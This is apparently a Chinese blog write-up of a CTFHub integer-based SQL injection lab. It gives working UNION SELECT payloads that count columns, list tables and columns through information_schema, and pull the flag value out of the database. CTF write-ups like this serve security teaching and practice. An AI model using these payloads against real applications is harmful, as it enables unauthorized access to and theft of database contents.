basket_ball本文最后更新于 805 天前,其中的信息可能已经有所发展或是发生改变。
所有靶场均来自CTFHub
SQL整数型注入
先输入个1试试,发现返回查询命令和结果
由于不是字符串型,所以可以不用添加引号’来闭合字符串
order by试试回显几个字段
发现order by 2时有结果,说明返回两个字段,直接SQL注入试试
先试试显示当前数据库
-1 union select 123,database()
直接显示结果了,并没有过滤
继续深入
-1 union select 123,group_concat(table_name) from information_schema.tables where table_schema=database()查找数据库内所有表名
发现flag表,flag肯定在这个表里,对这个表进行深入查询
-1 union select 123,group_concat(column_name) from information_schema.columns where table_name='flag'查找flag表内所有字段名,发现flag字段,flag值肯定在里面
-1 union select 123,flag from sqli.flag成功查询flag
